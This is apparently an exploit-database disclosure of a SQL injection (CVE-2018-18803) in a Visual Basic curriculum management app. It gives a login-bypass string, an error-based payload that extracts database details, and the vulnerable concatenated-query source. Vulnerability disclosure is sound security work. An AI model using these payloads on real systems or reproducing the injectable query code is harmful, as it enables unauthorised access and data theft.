119 lines
No EOL
4.4 KiB
Text
119 lines
No EOL
4.4 KiB
Text
# Exploit Title: Curriculum Evaluation System 1.0 - SQL Injection
|
|
# Dork: N/A
|
|
# Date: 2018-10-29
|
|
# Exploit Author: Ihsan Sencan
|
|
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/curriculumevaluationsystem_0.zip
|
|
# Version: 1.0
|
|
# Category: Windows
|
|
# Tested on: WiN7_x64/KaLiLinuX_x64
|
|
# CVE: CVE-2018-18803
|
|
|
|
# POC:
|
|
# 1)
|
|
# User: 'or 1=1 or ''='
|
|
# ' AnD EXTRAcTVaLUE(22,CoNCaT(0x5c,veRSion(),(SElECT (ElT(1=1,1))),database()))-- Efe
|
|
|
|
# POC:
|
|
# 2)
|
|
# User: 'or 1=1 or ''='
|
|
# Pass: Null
|
|
#
|
|
# https://2.bp.blogspot.com/-4O0oZTFkzJE/W9Y4HWcImQI/AAAAAAAAEN4/5P-n-9H6JAQMiN6UpJu340xI4x_-MSjHACLcBGAs/s1600/sql5.png
|
|
|
|
#[PATH]/frmCourse.vb
|
|
#....
|
|
#47 Private Sub txtSearch_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged
|
|
#48 sql = "Select * From tblcourse WHERE Course Like '%" & txtSearch.Text & "%'"
|
|
#49 reloadDtg(sql, dtglist)
|
|
#50 End Sub
|
|
#....
|
|
|
|
#[PATH]/includes/user.vb
|
|
#....
|
|
#05 Public Sub login(ByVal username As Object, ByVal pass As Object)
|
|
#06 Try
|
|
#07
|
|
#08 con.Open()
|
|
#09 reloadtxt("SELECT * FROM `tbluseraccount` WHERE User_name= '" & username & "' and Pass = sha1('" & pass & "')")
|
|
#10
|
|
#11
|
|
#12 If dt.Rows.Count > 0 Then
|
|
#13 If dt.Rows(0).Item("UserType") = "Administrator" Then
|
|
#14 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
|
|
#15 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
|
|
#16 With Form1
|
|
#17 .tsAddG.Enabled = True
|
|
#18 .tsStudent.Enabled = True
|
|
#19 .tsCurriculum.Enabled = True
|
|
#20 .tsGrades.Enabled = True
|
|
#21 .tsReport.Enabled = True
|
|
#22 .tsUtilities.Enabled = True
|
|
#23 .tsSearchStudent.Enabled = True
|
|
#24 .tsLogin.Image = My.Resources.logout
|
|
#25 .tsLogin.Text = "Logout"
|
|
#26 End With
|
|
#27
|
|
#28
|
|
#29 LoginForm1.Close()
|
|
#30
|
|
#31
|
|
#32 ElseIf dt.Rows(0).Item("UserType") = "Faculty" Then
|
|
#33
|
|
#34 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
|
|
#35 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
|
|
#36 With Form1
|
|
#37 .tsAddG.Enabled = True
|
|
#38 .tsStudent.Enabled = True
|
|
#39 .tsCurriculum.Enabled = True
|
|
#40 .tsGrades.Enabled = True
|
|
#41 .tsReport.Enabled = True
|
|
#42 .tsSearchStudent.Enabled = True
|
|
#43 .tsLogin.Image = My.Resources.logout
|
|
#44 .tsLogin.Text = "Logout"
|
|
#45 End With
|
|
#46
|
|
#47
|
|
#48
|
|
#49
|
|
#50 LoginForm1.Close()
|
|
#51
|
|
#52
|
|
#53
|
|
#54 ElseIf dt.Rows(0).Item("UserType") = "Assistant" Then
|
|
#55 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
|
|
#56 'With Form1
|
|
#57 With Form1
|
|
#58 .tsAddG.Enabled = True
|
|
#59 .tsStudent.Enabled = True
|
|
#60 .tsCurriculum.Enabled = True
|
|
#61 .tsGrades.Enabled = True
|
|
#62 .tsReport.Enabled = True
|
|
#63
|
|
#64 .tsSearchStudent.Enabled = True
|
|
#65 .tsLogin.Image = My.Resources.logout
|
|
#66 .tsLogin.Text = "Logout"
|
|
#67 End With
|
|
#68
|
|
#69
|
|
#70 LoginForm1.Close()
|
|
#71 End If
|
|
#72
|
|
#73 'Form1.UserIdToolStripStatus.Text = dt.Rows(0).Item("UserId")
|
|
#74 'Form1.UserToolStripStatus.Text = dt.Rows(0).Item("Fullname")
|
|
#75 'Form1.StatusStrip1.Visible = True
|
|
#76 'inserting logs
|
|
#77 'sql = "INSERT INTO `tbllogs` (`UserId`, `LogDate`,LogMode) " & _
|
|
#78 ' " VALUES ('" & dt.Rows(0).Item("UserId") & "',Now(),'Logged in')"
|
|
#79 'create(sql)
|
|
#80
|
|
#81 Else
|
|
#82 MsgBox("Acount doest not exist!", MsgBoxStyle.Information)
|
|
#83 End If
|
|
#84 Catch ex As Exception
|
|
#85 MsgBox(ex.Message)
|
|
#86 End Try
|
|
#87 con.Close()
|
|
#88 da.Dispose()
|
|
#89 End Sub
|
|
#.... |